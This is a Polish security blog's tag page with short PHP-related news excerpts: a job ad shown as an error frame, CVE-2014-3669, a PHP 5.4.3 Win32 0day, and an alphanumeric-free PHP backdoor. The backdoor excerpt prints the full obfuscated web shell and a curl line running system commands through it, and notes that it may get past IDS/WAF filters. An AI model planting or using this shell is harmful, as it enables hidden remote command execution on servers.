Wpisy z tagiem "PHP"

trojmiasto.pl pilnie potrzebuje developera PHP

Dominik donosi, że serwis trojmiasto.pl wyświetla ciekawy komunikat na górze strony. Cała witryna wygląda tak:

A jej najciekawszy fragment w powiększeniu tak:

Ktoś rozpoznaje ramkę z błędem?

PS. Jeśli to prawdziwe ogłoszenie, to gratulujemy pomysłu.

Aktualizacja: Faktycznie trwa rekrutacja.… Czytaj dalej

Zdalne wykonanie kodu w PHP do wersji 5.6.1, 5.5.17 i 5.4.33

W ostatnim czasie deweloperzy usunęli sporo poważnych błędów w PHP. Najpoważniejszy z odkrytych przez badaczy z High-Tech Bridge błędów to CVE-2014-3669, który może prowadzić do zdalnego wykonania kodu i dotyczy systemów 32-bitowych.

Błąd dotyczy deserializacji przekazywanych danych. Przy odpowiednich wartościach w systemach 32 bitowych udaje się przepełnić integera (long ma przedział od 2147483647 do -2147483648), a co za tym idzie, wskazać na niewłaściwe adres pamięci.… Czytaj dalej

Tylna furtka w PHP bez znaków alfanumerycznych

Również bez cudzysłowów, funkcji, stałych… Ciekawe, ile systemów typu IDS/WAF może ominąć. Wygląda tak:

@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

a używa się jej tak:

$ curl 'http://127.0.0.1:9999/shell.php?0=system&1=uname%20-a'
Czytaj dalej
Polski exploit 0day na PHP 5.4.3 Win32

Polski exploit 0day na PHP 5.4.3 Win32

Od przynajmniej tygodnia krąży w sieci exploit na PHP 5.4.3 na Windows, wykorzystujący lukę w funkcji com_print_typeinfo. Co ciekawe, autorem kodu exploita jest Polak, Maksymilian Motyl, znany pod pseudonimem 0in.

Do tej pory nie została wydana poprawka, zatem możliwości obrony przed potencjalnym atakiem są niestety dość ograniczone.… Czytaj dalej